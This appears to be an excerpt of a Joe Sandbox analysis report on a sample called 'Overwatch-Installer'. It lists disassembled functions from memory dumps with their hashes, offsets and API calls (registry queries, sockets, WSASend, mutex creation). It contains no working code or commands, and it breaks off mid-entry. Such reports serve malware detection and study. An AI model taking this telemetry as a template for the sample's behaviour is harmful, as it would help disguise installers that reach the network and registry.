Opcode ID: d88315c36418eb2de948b0fa6eb790a18bf06f82d75bb724e7beb65edc7bd952
Instruction ID: 3a5c8c4db1846dab2954e372a0ff13a56112281fd44babc72ca60a28c694ab73
Opcode Fuzzy Hash: d88315c36418eb2de948b0fa6eb790a18bf06f82d75bb724e7beb65edc7bd952
Instruction Fuzzy Hash: 3B02A774B001149FDB189BF9C9107AE77E7EF88308F104479D5099BBA4DF7A9C8A8B91

Function 052F1299 Relevance: .5, Instructions: 497COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4505713322.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4955de25939ba9d19b7576258c731fef687a3c60617bc1a003bf565258e9f024
Instruction ID: 69e4cd4246488226a11589777104818ee7fc20a768d67bb405d0d3867b256dba
Opcode Fuzzy Hash: 4955de25939ba9d19b7576258c731fef687a3c60617bc1a003bf565258e9f024
Instruction Fuzzy Hash: CE022230B041118BDB2CA739E5503BDB6A3AFC9208F448079C51AAB7D5DF79CC9AC796

Function 0670A7E8 Relevance: .2, Instructions: 227COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4513229338.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6700000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 959a43d25a587f0bdeb378bcb11c23a972800b8d5fabb4931cbb88b29afe4b40
Instruction ID: 53ec28e10895f53823c29ecdc35759cf95d8939695b631e7f9e398f1b3225580
Opcode Fuzzy Hash: 959a43d25a587f0bdeb378bcb11c23a972800b8d5fabb4931cbb88b29afe4b40
Instruction Fuzzy Hash: 51A1C074E00218CFDB54DFA9C584BEDBBF2AF88304F20816AD419AB395DB359985CF60

Function 0670A7D9 Relevance: .2, Instructions: 203COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4513229338.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6700000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72b2242154d6b7b9f45ba73b1d9a0bd0b14009874b93ddb118fcd8ef3672b1b1
Instruction ID: aecc06cd34bf70f21f04ca29f0e274a842a4eca7046434c621cbdce179895783
Opcode Fuzzy Hash: 72b2242154d6b7b9f45ba73b1d9a0bd0b14009874b93ddb118fcd8ef3672b1b1
Instruction Fuzzy Hash: E191B1B4E00218DFEB54DFA9C984BEDBBF2AF88304F20816AD415AB395DB345945CF61

Function 0670A138 Relevance: .1, Instructions: 132COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4513229338.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6700000_Overwatch-Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5ccf868d7946af42c87d8aeefce151a0b8ab5ff77486ced70faeb724e316f79
Instruction ID: b2319216e871a1d40b2ce161b72ec25d1a570e4125a933aea70151b987975b32
Opcode Fuzzy Hash: d5ccf868d7946af42c87d8aeefce151a0b8ab5ff77486ced70faeb724e316f79
Instruction Fuzzy Hash: FA51F9B5D01219CBEB68CF66C8457DEFBF2AB88304F00C1B9C519A7695DB740A85CF50

Function 052F9D54 Relevance: 3.2, APIs: 2, Instructions: 249libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052F9D97
LdrInitializeThunk.NTDLL ref: 052F9E4C

Memory Dump Source

Source File: 00000000.00000002.4505713322.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_Overwatch-Installer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a6ec04ff8bc912ac86e1955263141aaf020a689feda17edc2e058b5e603e78cf
Instruction ID: b55b4e80a77fd722e2f683de54d8f7d080f47e3f556b43c95c8e28f9cbc5770b
Opcode Fuzzy Hash: a6ec04ff8bc912ac86e1955263141aaf020a689feda17edc2e058b5e603e78cf
Instruction Fuzzy Hash: 34A16974A052249FCB68DF25D9547AEB7F2EF88204F1081A9D40EA7794DB399DC5CF80

Function 052F9D4B Relevance: 3.2, APIs: 2, Instructions: 244libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 052F9D97
LdrInitializeThunk.NTDLL ref: 052F9E4C

Memory Dump Source

Source File: 00000000.00000002.4505713322.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_52f0000_Overwatch-Installer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 07fcb4e93c888ed4a05665b38c841a920afff40c04bf80abfb64ba02ea32bb1a
Instruction ID: 14e49234e00a89016eb70b8774f3ab2f40a8b753045e194f23de018c3e043d5c
Opcode Fuzzy Hash: 07fcb4e93c888ed4a05665b38c841a920afff40c04bf80abfb64ba02ea32bb1a
Instruction Fuzzy Hash: 58A16A74A052249FCB68DF26D9547AEB7F2EF88204F1081A9D40EA7794DB399DC5CF80

Function 0670EAA8 Relevance: 1.9, APIs: 1, Instructions: 437
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 0670EF4E

Memory Dump Source

Source File: 00000000.00000002.4513229338.0000000006700000.00000040.00000800.00020000.00000000.sdmp, Offset: 06700000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6700000_Overwatch-Installer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 17d4f1173caff65c47faf1a887ef6fbb06e3dc82f95f01493159303e091de93a
Instruction ID: 7bf3cdfbbfd2c1a611c1947e5f1fd437e994d99fe2ba590e5030be36ae4ec7d7
Opcode Fuzzy Hash: 17d4f1173caff65c47faf1a887ef6fbb06e3dc82f95f01493159303e091de93a
Instruction Fuzzy Hash: 4CF16D74B01105CFDB54EBA4D894AADB7F2EF88304F24C569D406AB394DB35EC86CBA1

Function 06870F00 Relevance: 1.8, APIs: 1, Instructions: 331
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06870F51

Memory Dump Source

Source File: 00000000.00000002.4513421688.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6870000_Overwatch-Installer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 0def9e3182568fd62967bf4afed5ccf100955a04f53290d3e735e6876735b1fc
Instruction ID: 0c7feda9aaf87a26fd8b26453c75715b55cadfc4e807642aa1a79aed8875abc2
Opcode Fuzzy Hash: 0def9e3182568fd62967bf4afed5ccf100955a04f53290d3e735e6876735b1fc
Instruction Fuzzy Hash: 99C17F34B001188FCB44DBB8C5986ADB7F2EF88304F658529D486EBB55DB39EC46CB85

Function 06870EF1 Relevance: 1.8, APIs: 1, Instructions: 318
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06870F51

Memory Dump Source

Source File: 00000000.00000002.4513421688.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6870000_Overwatch-Installer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5bdebdc0b1448c3ae40cb2d61bdafb51a8d8b627e6a86127a6fba087c08b5d49
Instruction ID: 0e163b14968f8209d8081e8e1cc40add05d5c8e2ea535104b01466635b98dec8
Opcode Fuzzy Hash: 5bdebdc0b1448c3ae40cb2d61bdafb51a8d8b627e6a86127a6fba087c08b5d49
Instruction Fuzzy Hash: 52C15034B001188FCB44DBB8C5986ADB7F2EF88304F658529D496EBB99DB35EC46CB44

Function 06870070 Relevance: 1.7, APIs: 1, Instructions: 196
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 068700AE

Memory Dump Source

Source File: 00000000.00000002.4513421688.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6870000_Overwatch-Installer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c038eff641922312eb45688922e78f597020f74c41151a0e1b8f60b7e0d5012d
Instruction ID: d9358bb36a74348a8c8e1ca964338e316b64cf01b055b518c96ac01aac4da0b8
Opcode Fuzzy Hash: c038eff641922312eb45688922e78f597020f74c41151a0e1b8f60b7e0d5012d
Instruction Fuzzy Hash: 8B715E74A11209DFDB54DFA5D494BAEB7F2AF88318F248529E405E7394CB38DC85CB90

Function 06873ECE Relevance: 1.6, APIs: 1, Instructions: 141
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06874021

Memory Dump Source

Source File: 00000000.00000002.4513421688.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6870000_Overwatch-Installer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 34a59807e12d61148196002b715082de39938e2a92b4d49bd35720a891bba1aa
Instruction ID: b754fefa0305ba5988fc8f0286b335856c63703719d365f7d07127e0ee8aa6e7
Opcode Fuzzy Hash: 34a59807e12d61148196002b715082de39938e2a92b4d49bd35720a891bba1aa
Instruction Fuzzy Hash: 19419F74F003109FCBA8EB75D68066EB7E3EB99204F20816ED2059BB65E736D895CB41

Function 06873F28 Relevance: 1.6, APIs: 1, Instructions: 117
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06874021

Memory Dump Source

Source File: 00000000.00000002.4513421688.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6870000_Overwatch-Installer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b13f923a025f0eb5aa0f78cf6d8ad08d5608a0b1c5fb3cf0abbfc6071f6bf5b0
Instruction ID: f65a7f585a9c8354cf7c868f7bba17f497be02dd896defacb44ca623a2e6d5a7
Opcode Fuzzy Hash: b13f923a025f0eb5aa0f78cf6d8ad08d5608a0b1c5fb3cf0abbfc6071f6bf5b0
Instruction Fuzzy Hash: B9419074E003109FC7A8EF71C68066E77E3EB99604F60852EC20197B64E736E895CB51

Function 06870007 Relevance: 1.6, APIs: 1, Instructions: 103
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 068700AE

Memory Dump Source

Source File: 00000000.00000002.4513421688.0000000006870000.00000040.00000800.00020000.00000000.sdmp, Offset: 06870000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6870000_Overwatch-Installer.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 37ffc7b98fab958869b291380b5925e24b5872ad0d190999a4cfb933ae68d8a9
Instruction ID: 39042f14b2566d6591cd80ac779ca0c9c29d3efe402b849aaab8bf787998488d
Opcode Fuzzy Hash: 37ffc7b98fab958869b291380b5925e24b5872ad0d190999a4cfb933ae68d8a9
Instruction Fuzzy Hash: 5631CF708193959FDB16CFB4C850A9EBFF1AF46300F2484AAD081EB292D7389845CBA1

Function 0112BD62 Relevance: 1.6, APIs: 1, Instructions: 103
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?), ref: 0112BE21

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 464bd582edc4d5a955278e3ab50823f3495a870b0ff3a58c932babd31b99c43b
Instruction ID: b7e8aa360992f3975005943058df258eaa16ec3c263f347a51dc3af37c804109
Opcode Fuzzy Hash: 464bd582edc4d5a955278e3ab50823f3495a870b0ff3a58c932babd31b99c43b
Instruction Fuzzy Hash: 0B31D371508380AFE712CF25CC44BA2BFE8EF06314F08849AE9858B653D331A809D771

Function 05BF1F1F Relevance: 1.6, APIs: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

getaddrinfo.WS2_32(?,00000E24), ref: 05BF1FF7

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: bef37d0501621b24b4d725a43d4481ca242cdcc08ca73c4c18f1cf745c3d32f2
Instruction ID: 00a58856259ce6fcb6511041fa646fcca1e63fafc09e7ba1bb3d84728590f079
Opcode Fuzzy Hash: bef37d0501621b24b4d725a43d4481ca242cdcc08ca73c4c18f1cf745c3d32f2
Instruction Fuzzy Hash: 1131A5B1004384AFE7218F60CC44FAAFBBCEF05714F04449AFA859B292D375A949CB71

Function 05BF167A Relevance: 1.6, APIs: 1, Instructions: 100
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05BF1731

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 153fa5fa99f7a8f6a09ce5711e02dbabc57759dad0a11b185189cc75bb9f3ab9
Instruction ID: 0007feb92ab5964cbd1096533240d23fdda8594f80cbefa09e0fbf5a4711bdca
Opcode Fuzzy Hash: 153fa5fa99f7a8f6a09ce5711e02dbabc57759dad0a11b185189cc75bb9f3ab9
Instruction Fuzzy Hash: 873185B1404344AFD7228F55DC44FABBFACEF45314F04889AE9859B552D364E90DCBB1

Function 05BF03F8 Relevance: 1.6, APIs: 1, Instructions: 95
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSASocketW.WS2_32(?,?,?,?,?), ref: 05BF04AA

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Socket
String ID:
API String ID: 38366605-0
Opcode ID: 902b1cb31a8ef259035e1453355df3f448ac36b9dfa3e9107eadd80a88e89b22
Instruction ID: 235273e120dc4cf34fdaf78f3150a551da5f75b2a49ee04af4056eaadb59be09
Opcode Fuzzy Hash: 902b1cb31a8ef259035e1453355df3f448ac36b9dfa3e9107eadd80a88e89b22
Instruction Fuzzy Hash: 4C3192714093C4AFD723CB65CC45F66BFB9EF06210F0884DAE9858B5A3C365A818CB72

Function 05BF12F7 Relevance: 1.6, APIs: 1, Instructions: 95
encryptionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CertGetCertificateChain.CRYPT32(?,00000E24,?,?), ref: 05BF13BA

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: CertCertificateChain
String ID:
API String ID: 3019455780-0
Opcode ID: 97c9a2a29799ace45de4d3d3409e39d71c97701958df7d89a188c5503976c4b4
Instruction ID: 02ec9e4b783b525c9de185137fb45a9283d78539c6f858764113f5e1b209951d
Opcode Fuzzy Hash: 97c9a2a29799ace45de4d3d3409e39d71c97701958df7d89a188c5503976c4b4
Instruction Fuzzy Hash: E631907154D3C45FD3038B258C61AA2BFB4EF47614F0A84DBD8C48F6A3D624691AD7B2

Function 05BF11F9 Relevance: 1.6, APIs: 1, Instructions: 92
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAIoctl.WS2_32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF12AD

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Ioctl
String ID:
API String ID: 3041054344-0
Opcode ID: 16f1acbf67257c44dd2cb83793afd2019e17e2333f3756249b115829f31f06c9
Instruction ID: abde3445bf3be425fa868ec91b99efa01b3f022d3fad281fae4e3bb872acd0a6
Opcode Fuzzy Hash: 16f1acbf67257c44dd2cb83793afd2019e17e2333f3756249b115829f31f06c9
Instruction Fuzzy Hash: FB317C75109780AFDB22CF55CC44FA6BFB8EF06314F08889AE9858B562D325A909CB61

Function 05BF187A Relevance: 1.6, APIs: 1, Instructions: 92
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05BF1926

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 68fc6d384f192c2db022e1b59616a9d0bece6a6573d41fc73cb3f7cb6a5e1d1b
Instruction ID: 2b9597f0a3fd4cff6f8d39847b1e3e4e145522c79e764413a4d208b43ef216ba
Opcode Fuzzy Hash: 68fc6d384f192c2db022e1b59616a9d0bece6a6573d41fc73cb3f7cb6a5e1d1b
Instruction Fuzzy Hash: 2031A7B1409384AFD722CB64DC44FA6BFB8EF06314F0884DAE9849B653D225A90DC7B1

Function 0112B6CD Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 0112B788

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 97dff754ffc497a3dda0fb11501ca33dae9b4b58810e1c98afa4b5177c06481e
Instruction ID: 8b8cd59dcb446165689af8e1fd3e6d3c343b67ffe200c0b0cd9a580035b323ea
Opcode Fuzzy Hash: 97dff754ffc497a3dda0fb11501ca33dae9b4b58810e1c98afa4b5177c06481e
Instruction Fuzzy Hash: 353190751097845FE722CB25CC45FA2BFB8EF06214F08849AE9858B692D364E548CB65

Function 05BF0820 Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E24), ref: 05BF08B7

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: a19e62c2783659258acf404a75a6516c9863e7024ac8acf76abe3ef57867bf21
Instruction ID: 4f88c109e9680c11d8fb41697ce3dc102299b1350b35a3bb5a9cd342a129f8aa
Opcode Fuzzy Hash: a19e62c2783659258acf404a75a6516c9863e7024ac8acf76abe3ef57867bf21
Instruction Fuzzy Hash: 49318171508384AFE721CB64DC45FABBFACEF05614F0884AAE985CB652D324E808CB61

Function 05BF3E34 Relevance: 1.6, APIs: 1, Instructions: 88networkCOMMON

Download Yara Rule

APIs

WSASend.WS2_32(?,00000E24,?,?), ref: 05BF3EE6

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Send
String ID:
API String ID: 121738739-0
Opcode ID: 512819ffdf773a3859809c2aaa75f03be239aa382895e5603b795533abc6a614
Instruction ID: f4fb65d19ef7cdd2c9fee8f09a4c6eeb7ca0c48083b4384cc7dc0eeade48c70e
Opcode Fuzzy Hash: 512819ffdf773a3859809c2aaa75f03be239aa382895e5603b795533abc6a614
Instruction Fuzzy Hash: D8315C7144E3C05FC3138B758C61A66BFB4EF47220F0A84DBD884CB5A3D229A919D7B2

Function 05BF0722 Relevance: 1.6, APIs: 1, Instructions: 87registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF07CC

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 9004a54e494587b60735b84f5e09bd800c480f85dce0b9639e7037ec3d803701
Instruction ID: 71b127ca7e37864b33646ce5ff97c7c6812305e4b4219172c737e2c57f0fe36b
Opcode Fuzzy Hash: 9004a54e494587b60735b84f5e09bd800c480f85dce0b9639e7037ec3d803701
Instruction Fuzzy Hash: FC31B1724093846FD722CB25CC44FA2BFF8EF06310F0884DAE9858B163D264A90DCBB1

Function 0112B5D9 Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 0112B685

Memory Dump Source

Source File: 00000000.00000002.4462844193.000000000112A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0112A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_112a000_Overwatch-Installer.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: a0e48968d35021135f21e12b804cee433cf2ef0d7bfd262e456181de737c6056
Instruction ID: bfbfefd3cd09b7fc52b97d7c97437b728495f111a282eb5d2e4f2eabe933dfc6
Opcode Fuzzy Hash: a0e48968d35021135f21e12b804cee433cf2ef0d7bfd262e456181de737c6056
Instruction Fuzzy Hash: E3218F72408384AFE7218F55CC84FABFBBCEF05314F08849AE9858B652D325E558CBB5

Function 05BF0C6D Relevance: 1.6, APIs: 1, Instructions: 85synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNEL32(?,?), ref: 05BF0D0D

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: c7eadb0082379f3b98fbec53b24a773816ca8082c00f63d2d15d62f7629c0567
Instruction ID: 79608a614fa3742879c2e7a0c9b825c920603dfbe3bae806cf88413f2aaf88e0
Opcode Fuzzy Hash: c7eadb0082379f3b98fbec53b24a773816ca8082c00f63d2d15d62f7629c0567
Instruction Fuzzy Hash: 1F31A4B15093846FE711CF25CC45F56FFF8EF06214F08849AE9858B252D365E808CB71

Function 05BF1F52 Relevance: 1.6, APIs: 1, Instructions: 84COMMON

Download Yara Rule

APIs

getaddrinfo.WS2_32(?,00000E24), ref: 05BF1FF7

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: getaddrinfo
String ID:
API String ID: 300660673-0
Opcode ID: 718ffd9b5bac6f5b7bacfffa47d62141c61b49ac0d835b6e585ad7feb967633f
Instruction ID: e713bd5a61343cf4c7da036f56a188d280d1c2a5b5660060b66a9a2ed4f1cff5
Opcode Fuzzy Hash: 718ffd9b5bac6f5b7bacfffa47d62141c61b49ac0d835b6e585ad7feb967633f
Instruction Fuzzy Hash: 7A21D372104244AFEB20DF60CC84FAAF7ACEF04714F04889AFA499B681D775A54DCB75

Function 05BF50A0 Relevance: 1.6, APIs: 1, Instructions: 84registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF513C

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 22d8bc4e6b2501531094a111ed6a5ac2f07493406bff55e63acc0c1060ea0d59
Instruction ID: 7aa605e353ec33b6eb1aa031a361f7d113dc44da5d75510b63977622605a2535
Opcode Fuzzy Hash: 22d8bc4e6b2501531094a111ed6a5ac2f07493406bff55e63acc0c1060ea0d59
Instruction Fuzzy Hash: B3218E71109380AFD722CF54DC44FA7BFB8EF06210F0884DAE985CB692D224E948CBB1

Function 05BF1036 Relevance: 1.6, APIs: 1, Instructions: 84timeCOMMON

Download Yara Rule

APIs

GetProcessTimes.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF10C9

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: ProcessTimes
String ID:
API String ID: 1995159646-0
Opcode ID: 3161ec9a59e4fe57ed480726bcbe23e4a6a69b40496adc7d3f42cb587b08117b
Instruction ID: 68c41c3c88aad75f478a784b9277f98ea21c4e15a4d74e72e248bbaff02a6452
Opcode Fuzzy Hash: 3161ec9a59e4fe57ed480726bcbe23e4a6a69b40496adc7d3f42cb587b08117b
Instruction Fuzzy Hash: 7821B671509380AFD722CF65CC45FA6FFB8EF46210F0888EAE985CB552D325A508CB75

Function 05BF4F9E Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E24), ref: 05BF5032

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 9d3e2307570f17cca4f9c2dbf7cc5a30de3701bb99020f44ce637ef4c76aba25
Instruction ID: f2f18cef682ddbbf5d5719fec819c5a01c54ea149b66ecc595c91528c53999c4
Opcode Fuzzy Hash: 9d3e2307570f17cca4f9c2dbf7cc5a30de3701bb99020f44ce637ef4c76aba25
Instruction Fuzzy Hash: 03218271509384AFE7218F61DC44F6BFFBCEF05610F04849AE9459B692D365E4088B71

Function 05BF158C Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenCurrentUser.KERNEL32(?,00000E24), ref: 05BF1625

Memory Dump Source

Source File: 00000000.00000002.4507848928.0000000005BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5bf0000_Overwatch-Installer.jbxd

Similarity

API ID: CurrentOpenUser
String ID:
API String ID: 1571386571-0
Opcode ID: cabcd424b2d8b21752a749b0841c745bc931209ca38f7c341e04b5871161392e
Instruction ID: d001e4ee56be36e39090898474b9dd2af196d6ed6ad9a119a07facc309aacafa
Opcode Fuzzy Hash: cabcd424b2d8b21752a749b0841c745bc931209ca38f7c341e04b5871161392e
Instruction Fuzzy Hash: BC21B471409384AFEB228B24DC44FAABFB8EF06314F0884DBE9448F553D264A90DCB71

Function 05BF1786 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegNotifyChangeKeyValue.KERNEL32(?,00000E24,DB04A2A7,00000000,00000000,00000000,00000000), ref: 05BF1830

Memory Dump Source

